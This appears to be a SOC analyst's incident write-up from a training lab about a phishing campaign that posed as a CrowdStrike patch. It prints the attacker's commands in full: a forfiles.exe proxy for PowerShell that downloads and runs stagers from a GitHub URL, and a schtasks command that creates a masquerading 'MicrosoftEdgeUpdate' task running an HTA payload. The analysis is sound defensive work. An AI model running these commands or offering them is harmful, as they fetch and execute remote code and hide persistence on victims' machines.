🔎 What

Indirect command execution via forfiles.exe (LOLBin) used to proxy PowerShell, downloading and executing a two-stage dropper from GitHub. A scheduled task was created for persistence, using mshta.exe to execute an HTA payload every 30 minutes.

🕐 When

Jul 22, 2024, 06:04 AM

🌐 Where

• Host: Sierra
• IP: 172[.]16[.]17[.]86
• Working Directory: C:\Users\LetsDefend\Downloads\cs-patch-19\
• Payload drop path: C:\Users\LetsDefend\Documents\update.hta
• Persistence payload: C:\Users\admin\AppData\Local\Temp\update.hta

👤 Who

User on Sierra was phished via an email from support[@]crowdstrikereport[.]com, lured into downloading a fake CrowdStrike patch from an S3-hosted zip.

❓ Why

The attacker posed as CrowdStrike support, delivering a malicious zip (cs-patch-19.zip) via a phishing link. The zip contained a script executed via cmd.exe, which called forfiles.exe to indirectly invoke PowerShell — bypassing controls that might flag powershell.exe directly. PowerShell used iex/iwr to pull two stagers from a GitHub user repository and saved update.hta locally. An encoded PowerShell blob then created a scheduled task named MicrosoftEdgeUpdate to run mshta.exe every 30 minutes, establishing persistence.

Key command:

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell -c iex (iwr https://raw.githubusercontent.com/ppt0/bhpoc/main/stager1);iwr https://raw.githubusercontent.com/ppt0/bhpoc/main/stager2 -o $env:C:\Users\LetsDefend\Documents\update.hta;"

Scheduled task created:

schtasks.exe /create /Sc minute /f /Tn MicrosoftEdgeUpdate /mo 30 /tr "mshta C:\Users\admin\AppData\Local\Temp\update.hta"

🧩 MITRE ATT&CK

🚨 IOCs

📊 Analysis Reports

• Any.run sandbox analysis
• VirusTotal URL scan